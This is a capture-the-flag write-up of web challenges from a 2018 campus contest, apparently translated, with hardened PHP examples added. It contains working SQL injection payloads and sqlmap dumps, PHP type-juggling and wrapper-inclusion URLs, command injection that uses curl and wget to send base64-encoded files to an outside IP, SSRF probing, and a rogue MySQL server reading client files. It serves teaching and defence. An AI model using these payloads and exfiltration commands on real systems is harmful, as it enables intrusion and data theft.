
2018 Campus Cyber Security Contest: Web WP

First of all, thanks to the challenge authors; some of these were really good, heh.

WEB

Obsidian (黑曜石)

Just change the User-Agent header.

Site Backend (网站后台)

Universal-password bypass; there is no filtering at all.

Payload:

uname=1") Or 1 -- -
Or: uname Or 1 #
Any password will do.

You can also dump it with sqlmap; remember to use a random User-Agent (the source checks the UA header):

py -2 sqlmap.py --random-agent -u "http://10.6.65.230:1011/index.php" --data="uname=1&passwd=2&submit=%E7%99%BB%E5%BD%95" --level 2

Or:
py -2 sqlmap.py -r C:\Users\徐超\Desktop\sql.txt --random-agent --level=2

This dumps the flag straight out of the relevant table:

E:\ctf工具\tools -cmd\sqlmapproject-sqlmap-1.1.10-33-g9ae713b\sqlmapproject-sqlmap-9ae713b>py -2 sqlmap.py -r C:\Users\徐超\Desktop\sql.txt --random-agent --level=2 -D sdutctf -T users --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.10.9#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:28:33

[22:28:33] [INFO] parsing HTTP request from 'C:\Users\徐超\Desktop\sql.txt'
[22:28:33] [INFO] fetched random HTTP User-Agent header from file 'E:\ctf工具\tools -cmd\sqlmapproject-sqlmap-1.1.10-33-g9ae713b\sqlmapproject-sqlmap-9ae713b\txt\user-agents.txt': 'Mozilla/6.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4'
[22:28:33] [INFO] resuming back-end DBMS 'mysql'
[22:28:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1") AND (SELECT * FROM (SELECT(SLEEP(5)))WOIJ) AND ("zmCd"="zmCd&passwd=2&submit=%E7%99%BB%E5%BD%95

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=1") UNION ALL SELECT NULL,CONCAT(0x71627a7671,0x78644b514a6950634376576e465142536279506566575466484565426672616c77675165724b4244,0x71766a6271)-- RQmS&passwd=2&submit=%E7%99%BB%E5%BD%95
---
[22:28:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[22:28:34] [INFO] fetching columns for table 'users' in database 'sdutctf'
[22:28:34] [INFO] the SQL query used returns 3 entries
[22:28:34] [INFO] retrieved: "id","int(2)"
[22:28:34] [INFO] retrieved: "username","varchar(255)"
[22:28:34] [INFO] retrieved: "password","varchar(255)"
[22:28:34] [INFO] fetching entries for table 'users' in database 'sdutctf'
[22:28:34] [INFO] the SQL query used returns 1 entries
[22:28:34] [INFO] analyzing table dump for possible password hashes
Database: sdutctf
Table: users
[1 entry]
+----+----------+--------------------------------------------+
| id | username | password                                   |
+----+----------+--------------------------------------------+
| 1  | admin    | SDUT2018{079bSyzFTHOk4cK8d30sDOfSbeEiKXUy} |
+----+----------+--------------------------------------------+

[22:28:34] [INFO] table 'sdutctf.users' dumped to CSV file 'C:\Users\徐超\.sqlmap\output\10.6.65.230\dump\sdutctf\users.csv'
[22:28:34] [INFO] fetched data logged to text files under 'C:\Users\徐超\.sqlmap\output\10.6.65.230'

[*] shutting down at 22:28:34

Finally, the challenge source:

<?php

//including the Mysql connect parameters.
include("sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
  $uname=$_POST['uname'];
  $passwd=$_POST['passwd'];

  // connectivity
  // The input is wrapped in double quotes but never escaped, so a value such as
  // 1") closes both the quote and the parenthesis in the query below.
  $uname='"'.$uname.'"';
  $passwd='"'.$passwd.'"';
  @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
  $result=mysql_query($sql);
  $row = mysql_fetch_array($result);

  if($row)
  {
    echo "<br>";
    echo '<p style="font-size:24pt;color:black;text-align:center">'.'GREAT!!!'.'<p>';
    echo '<p style="font-size:24pt;color:red;text-align:center">'. $row['password'].'<p>';
    echo "<br>";
  }
  else
  {
    echo '<font color= "#0000ff" font size="3">';
    echo 'You login error!';
    //print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo "</font>";
  }
}

?>
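For comparison, here is the same login written the way it should have been, as an added example that is not part of the challenge or of the original post: a PDO prepared statement keeps the user input out of the SQL text entirely, and the password is checked against a stored hash instead of a plaintext column. The DSN, the `app` database user, the `DB_PASS` environment variable and a `password` column holding `password_hash()` output are all assumptions.

```php
<?php
// Added example, not the challenge's code: the same login query using a
// prepared statement, so quotes and parentheses in uname/passwd can no longer
// change the statement. The DSN, the 'app' DB user, the DB_PASS environment
// variable and a password column holding password_hash() output are assumptions.
declare(strict_types=1);

function login(PDO $pdo, string $uname, string $passwd): ?array
{
    // The SQL text is fixed; the value travels separately as a bound parameter,
    // so MySQL never parses user input as part of the statement.
    $stmt = $pdo->prepare(
        'SELECT id, username, password FROM users WHERE username = :uname LIMIT 1'
    );
    $stmt->execute([':uname' => $uname]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // password_verify() compares against the stored hash in constant time;
    // the plaintext password never has to appear in a WHERE clause.
    if ($row === false || !password_verify($passwd, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

// Emulated prepares would rebuild the query as a string on the client side;
// turn emulation off so the binding really happens on the server.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=sdutctf;charset=utf8mb4', 'app', getenv('DB_PASS') ?: null, [
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);

// Arrays (uname[]=x) are rejected here instead of being cast to "Array" later.
if (isset($_POST['uname'], $_POST['passwd']) && is_string($_POST['uname']) && is_string($_POST['passwd'])) {
    $user = login($pdo, $_POST['uname'], $_POST['passwd']);
    echo $user === null
        ? 'You login error!'
        : 'Welcome, ' . htmlspecialchars($user['username'], ENT_QUOTES);
}
```

With this shape, `uname=1") Or 1 -- -` is looked up as a literal username and simply finds no row; sqlmap's time-based and UNION payloads fail for the same reason.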

What's the Password (密码是啥)

PHP code audit.

if (isset ($_GET['passwd'])) {

    // ereg() is the old, non-binary-safe regex function; here it only allows alphanumerics
    if (@ereg ("^[a-zA-Z0-9]+$", $_GET['passwd']) === FALSE)

        echo '你的密码不正确';

    // Loose comparison: a string like "1e95o7" is read as the number 1.0E+95 here
    else if (strlen($_GET['passwd']) < 10 && $_GET['passwd'] > 8888888) {

        // Note the second strpos() reads $_GET['password'], not $_GET['passwd']
        if (@strpos ($_GET['passwd'], '5o7') !== FALSE && @strpos ($_GET['password'], '---') !== FALSE)

            require("flag.txt");
    }

    else

        echo 'Invalid password';

}
        

The challenge author seems to have mistyped the code (the second strpos() reads $_GET['password'] rather than $_GET['passwd'])...

Payload:

http://10.6.65.230:1000/index.php?passwd=1e95o7&password=---

The Flag Is Hidden (flag隐藏了)

File inclusion through a PHP wrapper (php://filter).

Payload:

http://10.6.65.230:1001/index.php?page=php://filter/convert.base64-encode/resource=Y45uZmln.php

The flag rotates every 90 seconds, so be quick and try a few times...
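The defensive counterpart, added here as an example that is not part of the challenge or the original post: instead of passing `page` to `include()`, map it through a fixed allowlist so that wrapper URLs like `php://filter/...` and traversal strings never become a path. The page names and the `pages/` directory are assumptions.

```php
<?php
// Added example, not the challenge's code. The page parameter is mapped
// through a fixed allowlist, so php://filter/..., ../ and absolute paths never
// reach include(). The page names and the pages/ directory are assumptions.
declare(strict_types=1);

const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

function resolve_page(mixed $page): ?string
{
    // Anything that is not exactly one of the known keys (arrays, wrappers,
    // traversal, case variants) gets null; the raw value is never used as a path.
    if (!is_string($page) || !array_key_exists($page, PAGES)) {
        return null;
    }
    return PAGES[$page];
}

$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
// allow_url_include=Off does not cover php://filter (it is a local wrapper),
// which is why the allowlist, not an ini setting, is the control here.
include $target;
```

The point of the allowlist is that `Y45uZmln.php` or any other file is reachable only if the application itself listed it; the query string chooses a key, never a path.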

Equal? (相等?)

HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Tue, 11 Dec 2018 19:51:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.25
Hint: username&password
Content-Length: 147

<p>Login first</p><br/><!--1. $name == $password--><br/><!--2. sha1($name) === sha($password)--><br/><!--3. die $flag--><br/><!-- fight ! --><br/>

The response headers carry a hint; this one is easy.

Payload:

GET /index.php?username[]=1a&password[]=1 HTTP/1.1
Host: 10.6.65.230:1002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
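Both this challenge and "What's the Password" above rely on PHP's loose comparison rules: `sha1()` of an array is NULL on PHP 5 (so `NULL === NULL` holds), and `"1e95o7" > 8888888` is true because the string is read as the float 1.0E+95. The following is an added example, not code from the challenges or the original post, showing the strict checks that close both holes; it assumes PHP 8.

```php
<?php
// Added example, not the challenge's code. Two strict replacements for the
// loose checks behind "相等?" and "密码是啥": inputs are checked to be strings
// before any comparison, and string-to-number coercion is never relied on.
declare(strict_types=1);

// For "相等?": true only for a genuine sha1 collision of two different strings,
// which is what the hint asks for and what the array trick fakes.
function same_digest_different_value(mixed $name, mixed $password): bool
{
    // username[]=1a arrives as a PHP array. sha1(array) is NULL on PHP 5 (so
    // NULL === NULL holds) and a TypeError on PHP 8; reject non-strings first.
    if (!is_string($name) || !is_string($password)) {
        return false;
    }
    // === never coerces: "1e3" and "1000" stay different strings.
    if ($name === $password) {
        return false;
    }
    // hash_equals() is a length-safe, constant-time comparison of two strings.
    return hash_equals(sha1($name), sha1($password));
}

// For "密码是啥": "1e95o7" > 8888888 is true under loose comparison because the
// string is read as the float 1.0E+95. Validate it as an integer first instead.
function is_integer_above(mixed $value, int $min): bool
{
    if (!is_string($value)) {
        return false;
    }
    $n = filter_var($value, FILTER_VALIDATE_INT);   // "1e95o7" -> false
    return $n !== false && $n > $min;
}

// Example calls with the payloads from the writeup (both are rejected):
var_dump(same_digest_different_value(['1a'], ['1']));   // bool(false)
var_dump(is_integer_above('1e95o7', 8888888));          // bool(false)
```

The `is_string()` guard is the part people forget: `$_GET` can deliver arrays just as easily as strings, and any function that silently returns NULL or false on an array turns `==`, `===` on NULL, or even `sha1()` into a comparison of two failures.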

Trick (诡计)

Calculator (计算器)

Key back-end source:

<?php
    // $str (the user's expression) is interpolated into a shell command line unescaped
    echo $str." = ".shell_exec("echo \"$str\" | bc");
?>

The expression to evaluate is passed to bc as a string and the result is returned.

shell_exec() runs the shell command directly.

As you can see there is no filtering whatsoever. I set up an nc listener on my server and tried bash and nc reverse shells, but both failed (the author said docker blocks bash and nc reverse shells).

That leaves curl, wget and ping; let's try them one by one.

ping

[root@instance-7e0k9b9j /]# ping `ls | base64 -w 0`.dl.ixuchao.cn
ping: YmluCmJvb3QKZGV2CmV0Ywpob21lCmxpYgpsaWI2NApsb3N0K2ZvdW5kCm1lZGlhCm1udApvcHQKcHJvYwpyb290CnJ1bgpzYmluCnNydgpzeXMKdG1wCnVzcgp2YXIK.dl.ixuchao.cn: Name or service not known

The domain at the end is my self-hosted DNS server, roughly equivalent to a dnslog.

The prefix is too long and the local test failed, so this method is out.

curl

Start a Python web server on my own server:

python -m SimpleHTTPServer

Since newlines might truncate the output, base64-encode it and transfer it with curl.

Payload:

`curl http://106.12.150.166:8000/$(ls -l |base64 -w 0)`
-w 0 encodes everything on a single line without wrapping

The server log shows:

202.110.209.182 - - [11/Dec/2018 19:03:41] code 404, message File not found
202.110.209.182 - - [11/Dec/2018 19:03:41] "GET /dG90YWwgOAotci1zci1zci10IDEgcm9vdCByb290IDE3MDcgT2N0IDMwIDE0OjU2IGluZGV4LnBocAotcnctci0tci0tIDEgcm9vdCByb290ICAgNDIgRGVjIDEyIDAzOjAwIHRnbG5Jd1c2TWVPRmFqNEpHd01vVzhtWno0R2dMSFhsLnR4dAo= HTTP/1.1" 404 -
202.110.209.182 - - [11/Dec/2018 19:05:03] code 404, message File not found
202.110.209.182 - - [11/Dec/2018 19:05:03] "GET /U0RVVDIwMTh7UVRHSXl0b0hMUU9TQnJHZWdVSGxHd0JzOTlKT2F5THZ9 HTTP/1.1" 404 -

Decoded:

root@iZj6c1wjgvrqav2931bx62Z:/home# echo dG90YWwgOAotci1zci1zci10IDEgcm9vdCByb290IDE3MDcgT2N0IDMwIDE0OjU2IGluZGV4LnBocAotcnctci0tci0tIDEgcm9vdCByb290ICAgNDIgRGVjIDEyIDAzOjAwIHRnbG5Jd1c2TWVPRmFqNEpHd01vVzhtWno0R2dMSFhsLnR4dAo= | base64 -d
total 8
-r-sr-sr-t 1 root root 1707 Oct 30 14:56 index.php
-rw-r--r-- 1 root root   42 Dec 12 03:00 tglnIwW6MeOFaj4JGwMoW8mZz4GgLHXl.txt
root@iZj6c1wjgvrqav2931bx62Z:/home# echo U0RVVDIwMTh7UVRHSXl0b0hMUU9TQnJHZWdVSGxHd0JzOTlKT2F5THZ9 | base64 decode
base64: decode: No such file or directory
root@iZj6c1wjgvrqav2931bx62Z:/home# echo U0RVVDIwMTh7UVRHSXl0b0hMUU9TQnJHZWdVSGxHd0JzOTlKT2F5THZ9 | base64 -d
SDUT2018{QTGIytoHLQOSBrGegUHlGwBs99JOayLv}root@iZj6c1wjgvrqav2931bx62Z:/home# 

wget

wget works the same way as curl above: listen locally, payload as follows:

`wget http://106.12.150.166:8000/$(ls -l |base64 -w 0)`
  • Final note: since the flag changes every 10 seconds, here is a faster method.
Payload:
`curl http://106.12.150.166:80/ -X POST -d $(cat tglnIwW6MeOFaj4JGwMoW8mZz4GgLHXl.txt)`
Note: the value must be sent via POST; with GET, a value containing the special character '{' gets dropped.

nc listener:

[root@instance-7e0k9b9j ~]# nc -lvlk -p 80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 202.110.209.182.
Ncat: Connection from 202.110.209.182:33223.
POST / HTTP/1.1
User-Agent: curl/7.35.0
Host: 106.12.150.166
Accept: */*
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

SDUT2018{6LqX5IkhWLaKx66HnDLDVnJXLAfyrjZC}Ncat: Connection from 202.110.209.182.
Ncat: Connection from 202.110.209.182:39808.
POST / HTTP/1.1
User-Agent: curl/7.35.0
Host: 106.12.150.166
Accept: */*
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
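Back to the one-liner at the top of this section: the root problem is that `$str` is spliced into a shell command line. The following is an added example, not the challenge's code, showing how the same calculator looks when the expression is validated against a strict grammar and handed to bc on stdin via `proc_open()` with an argument array, so no shell is ever involved. It assumes `$str` comes from `$_GET['str']` and PHP 7.4 or later.

```php
<?php
// Added example, not the challenge's code. Hardened version of the
// calculator: the expression is validated against a strict grammar and then
// passed to bc as data on stdin through proc_open(), never interpolated into
// a shell command line. Assumes $str comes from $_GET['str'] (assumption).
declare(strict_types=1);

function calculate(string $expr): ?string
{
    // Only digits, a decimal point, basic operators, parentheses and spaces;
    // backticks, $(), ;, |, & and newlines are rejected before any process runs.
    if ($expr === '' || strlen($expr) > 200 || !preg_match('/\A[0-9+\-*\/^(). ]+\z/', $expr)) {
        return null;
    }
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    // Argument array (PHP 7.4+): bc is exec'd directly, so there is no shell to inject into.
    $proc = proc_open(['bc', '-q'], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    fwrite($pipes[0], $expr . "\n");   // the expression is data on stdin, not part of a command
    fclose($pipes[0]);
    $out = stream_get_contents($pipes[1]);
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $code = proc_close($proc);
    // bc reports syntax errors on stderr without a non-zero exit, so check both.
    return ($code === 0 && $err === '') ? trim($out) : null;
}

$str = $_GET['str'] ?? '';
if (!is_string($str)) {
    $str = '';
}
$result = calculate($str);
echo htmlspecialchars($str, ENT_QUOTES) . ' = ' . ($result ?? 'invalid expression');
```

Two layers do the work: the regex stops every one of the payloads used above (backticks, `$(...)`, `|`) at the door, and even if the grammar were ever loosened, `proc_open()` with an array never consults `/bin/sh`, so there is no command line left to break out of. The `htmlspecialchars()` on the echo closes the reflected-XSS side of the original `echo $str`.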

Speed Run (拼手速)

A simple one that tests your ability to write a Python crawler.

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/12/11 09:08 PM

import requests
from bs4 import BeautifulSoup as bs

url = 'http://10.6.65.230:1005/index.php?'

# Fetch the page and pull the short-lived flag out of its <button> element
res = requests.get(url=url)
html = res.text
soup = bs(html, 'lxml')
flag = soup.button.string
print(flag)

# Headers (including the session cookie) copied from the browser session
headers = {
   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
   'Accept' : '*/*',
   'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
   'Cookie' : 'session=.eJwdj8FqwzAQBX-l7NkHK7JDMPTQ4lQ4sGsS5ITVzandSrLlQkNpqpB_r9rDXN5hmHeDfghugeqtny9jBm6ASmw2GSwfy-sI1Q0ezlAB-fcfjs2VVCON2rk_KL5Yo1GytzNqG9r6YLGeYnvqBOrDTKGJpMgb30njn0rSFFBRaBVK0lygPwYOLFs9p21forfB-KNlnzyr7crU-4IjX43qoglN3uqpoHqYyE_f5t-zcxifHUfj8LSVqaVkzY9wz-DrMn4ufUgHQKyFyMt8nYD7L3n3TQ4.DvG99A.X83b73vdue76lkT5DbcAaWXqN_k',
}

# Submit the flag to the scoring endpoint before it rotates
data = {
    'key':flag,
    'nonce':'682c214b7dbbdbb71ae37b8e18f84a0939e514e6b34ccf57f0953f0cf8c756825fbf799f8d928ff5ab4a3a6d48c61de3fb499847d690dcf8bb30bc6b1a7e39a6'
}

url1 = 'http://10.6.65.222/chal/22'
res = requests.post(url=url1, headers=headers, data=data)
print(res.text)

Little Spider (小蜘蛛)

A typical SSRF challenge.

Right-click to view the source; there is a hint to visit:

http://10.6.65.230:1006/admin/index.php

It tells you that you are not a company employee; this kind of setup points to SSRF.

Also, when the crawler fetches its own http://localhost/admin/index.php, it reports the page title as "403 -- 请使用公司内部计算机名访问" (403: please access using the company's internal computer name), which again points at SSRF.

Crawling http://localhost/admin/index.php shows MMP...

Listen on port 80 with nc on my server and point the crawler at it. The X-Forwarded-For header in the captured request shows that the docker container's name is f954b1cb4035 and that the host, 10.6.65.230, is the upstream proxy in front of the containers:

[root@instance-7e0k9b9j ~]# nc -lvkp 80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 202.110.209.182.
Ncat: Connection from 202.110.209.182:64954.
GET / HTTP/1.0
Host: 106.12.150.166
X-Forwarded-For: f954b1cb4035, 10.6.65.230

Point the crawler at the page inside the docker container, http://f954b1cb4035/admin/index.php, and there is the flag.

Finally, the challenge source:

<!DOCTYPE html>
<html>
<head>
<?php
header('Content-Type:text/html; charset= utf-8');

function exceptions_error_handler($severity, $message, $filename, $lineno) {
    throw new ErrorException($message, 0, $severity, $filename, $lineno);
}
set_error_handler('exceptions_error_handler');
session_start();
$_SESSION['flag'] = '0';
include('include/extractTitleLogic.php');
if (isset($_POST['url'])) {
    try {
        $dumpurl = parse_url($_POST['url']);
        $httpurl = "";
        if (!empty($dumpurl['scheme']) && !empty($dumpurl['host']) && ($dumpurl['scheme'] == 'http' || $dumpurl['scheme'] == 'https')) {
            // Only the literal string 127.0.0.1 is blocked; localhost and the container hostname pass
            if ($dumpurl['host'] == '127.0.0.1')
                die('Kaka Say : MMP...');
            if (!empty($dumpurl['path']) && $dumpurl['path'] != '')
                $httpurl = ''.$dumpurl['scheme'].'://'.$dumpurl['host'].$dumpurl['path'];
            else
                $httpurl = ''.$dumpurl['scheme'].'://'.$dumpurl['host'].'/';
        } else {
            die('Kaka Say : MMP...');
        }
        // The container's own hostname is sent to whichever server gets fetched
        $hdrs = array(
            'http' => array(
                'header'  => "X-Forwarded-For: ".gethostname().", 10.6.65.230\r\n",
                "timeout" => 5,
            ),
        );
        $context = stream_context_create($hdrs);
        $cnt = 0;
        while ($cnt < 10 && ($content = file_get_contents($httpurl, false, $context)) === FALSE) $cnt++;
        $title = get_title($content);
    } catch (Exception $e) {
        echo "<center>抓取异常: " . $httpurl . "</center>";
        exit();
    }
}
?>

</head>
<body>
<center>
    <h1>Title 网页爬虫</h1>
    <form action='' method='POST'>
        <input placeholder='URL' name='url'>
        <input type='submit' value='获取网站Title'>
    </form>
    </br>
    <br>
    <b>
    <?php
    if (isset($title)) {
        echo is_array($title) ? '' : '网站标题 : '.htmlspecialchars($title, ENT_QUOTES).'</br></br>';
    } else {
        if (isset($_SESSION['flag']) and $_SESSION['flag'] == '1') {
            echo '没有Title标签,网页如下';
    ?>
            <br>
            <br><br>
            <div style="width: 691px; height: 464px;">
                <?php //print htmlspecialchars($content, ENT_QUOTES);
                print $content;
                ?>
            </div><br><br>
    <?php
        }
    }
    ?>
    </b>
    <!-- /admin/index.php -->
</center>
</body>
</html>
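The source above compares the host with the string `'127.0.0.1'`, so `localhost`, the container's own name and any internal address pass, and it then volunteers `gethostname()` in an X-Forwarded-For header to whatever it fetches. The following fetcher is an added example, not the challenge's code: it resolves the host and rejects any address in loopback, private or reserved space, refuses redirects, and sends no internal hostname. It assumes PHP 8 and an IPv4-only deployment (see the note after the code).

```php
<?php
// Added example, not the challenge's code. A fetcher that checks where the
// host actually resolves instead of comparing it with the string '127.0.0.1',
// and that stops forwarding the container's own hostname. Assumes PHP 8 and
// an IPv4-only deployment.
declare(strict_types=1);

// Returns the host's addresses if every one of them is public, else [].
function public_ips_for(string $host): array
{
    // Literal IPs need no lookup; names are resolved to all their A records so
    // the check covers whichever address the fetch would later use.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $ips = [$host];
    } else {
        $ips = gethostbynamel($host) ?: [];
    }
    foreach ($ips as $ip) {
        // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16 and fc00::/7;
        // NO_RES_RANGE rejects 127/8, 0/8, 169.254/16, ::1 and other reserved space.
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return [];   // one internal address rejects the whole host
        }
    }
    return $ips;
}

function safe_fetch(string $url): ?string
{
    $u = parse_url($url);
    if ($u === false || !isset($u['scheme'], $u['host'])
        || !in_array($u['scheme'], ['http', 'https'], true)
        || isset($u['user']) || isset($u['pass'])) {
        return null;
    }
    $port = $u['port'] ?? ($u['scheme'] === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        return null;
    }
    // localhost, 127.0.0.1, 10.6.65.x and docker container names all fail here.
    if (public_ips_for($u['host']) === []) {
        return null;
    }
    $ctx = stream_context_create(['http' => [
        'timeout'         => 5,
        'follow_location' => 0,    // a 3xx could otherwise redirect back inside
        'ignore_errors'   => true, // return the body for 4xx/5xx instead of false
        // no X-Forwarded-For header: the container hostname stays internal
    ]]);
    $body = file_get_contents($url, false, $ctx);
    return $body === false ? null : $body;
}

var_dump(safe_fetch('http://localhost/admin/index.php') === null);   // bool(true)
```

Two caveats a practitioner should keep in mind. `gethostbynamel()` only returns A records, so an IPv6-capable deployment also needs the AAAA records (`dns_get_record()`) run through the same filter. And resolving first and fetching second is a window for DNS rebinding; the robust version connects to the address it validated and sets the Host header itself, or enforces the egress policy at the network layer. Separately, the admin page on the other end must not treat X-Forwarded-For as proof of identity: the header is set by whoever sends the request.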

Brute-force Tool (爆破小工具)

A very novel idea; big thumbs up to the author.

Tested point: using the LOAD DATA LOCAL INFILE feature to read files from the client.

Reference: https://www.anquanke.com/post/id/106488

GitHub: https://github.com/bettercap/bettercap

The response headers give the flag's absolute path: Flag: /root/pXvA65B5F26sQPQKtg9EVMIfQW05EqkE.txt

Use bettercap on Kali (apt install bettercap) to stand up a simple MySQL server; when the client tries to connect to it, the server can read arbitrary files from the client.

Payload:

root@Archerx:~# bettercap -eval "set mysql.server.infile /root/pXvA65B5F26sQPQKtg9EVMIfQW05EqkE.txt; mysql.server on"
bettercap v2.11 (type 'help' for a list of commands)

10.6.65.0/24 > 10.6.65.44  » [19:56:10] [sys.log] [inf] [mysql.server] read file ( /root/pXvA65B5F26sQPQKtg9EVMIfQW05EqkE.txt ) is 41 bytes
10.6.65.0/24 > 10.6.65.44  » [19:56:10] [sys.log] [inf] 
SDUT2018{xSbXZdPV0LQDAeAwnAXD59U8lGpYnLaw}
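The defensive side of this one, added here as an example that is not part of the challenge or the original post: a client that lets users point it at arbitrary MySQL hosts (as this brute-force tool does) should refuse LOAD DATA LOCAL at the client level, explicitly rather than trusting the build's default, so a rogue server's file request is simply never honoured. Both the PDO and the mysqli ways of doing it are shown; the host, port and credential values are placeholders.

```php
<?php
// Added example, not the challenge's code. A client that must connect to a
// user-supplied MySQL host (as the brute-force tool here does) should refuse
// LOAD DATA LOCAL at the client level, so a rogue server cannot ask for files.
// Host, port and credential values are placeholders.
declare(strict_types=1);

function pdo_no_local_infile(string $host, int $port, string $user, string $pass): PDO
{
    $dsn = sprintf('mysql:host=%s;port=%d;charset=utf8mb4', $host, $port);
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        // The server's "send me this file" packet is refused by the client library.
        PDO::MYSQL_ATTR_LOCAL_INFILE => false,
        PDO::ATTR_TIMEOUT            => 3,   // a fake server should not hang the tool
    ]);
}

// The same setting for the mysqli extension; it must be set before connecting.
function mysqli_no_local_infile(string $host, int $port, string $user, string $pass): mysqli
{
    $m = mysqli_init();
    if ($m === false) {
        throw new RuntimeException('mysqli_init failed');
    }
    $m->options(MYSQLI_OPT_LOCAL_INFILE, 0);
    $m->options(MYSQLI_OPT_CONNECT_TIMEOUT, 3);
    if (!$m->real_connect($host, $user, $pass, null, $port)) {
        throw new RuntimeException('connect failed: ' . mysqli_connect_error());
    }
    return $m;
}

// Usage with placeholder values; both connections refuse LOAD DATA LOCAL requests.
$pdo = pdo_no_local_infile('db.example.invalid', 3306, 'tool', 'placeholder');
$mi  = mysqli_no_local_infile('db.example.invalid', 3306, 'tool', 'placeholder');
```

The mechanism being blocked is protocol-level: after any query, the server may answer with a LOCAL INFILE request naming a file on the client, and a cooperative client library reads it and sends it back. With the option off, the library answers that request with an error instead. Restricting which hosts the tool may connect to at all is the other half of the fix.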

Right-click to view the source:


        $text = $_GET["text"];
        $file = $_GET["file"];
        $result = $_GET["answer"];

        // $text is passed straight to file_get_contents(), so any wrapper URL works as the source
        if(isset($text)&&(file_get_contents($text,'r')==="The first step")){
            echo "hello admin!<br>";
            include($file); //try to get all the code of tishi.php
        }else{
            echo "you are not admin ! ";
        }

        didi: __tostring()

        -->

Kaka's PHP (kaka的php)

Tested points:

  • PHP wrappers (php://)
  • PHP deserialization

There is a very similar challenge on bugku; the construction is as follows:

I originally wanted to put all the solutions in one post, but that would be too long, so I'll write them up separately.
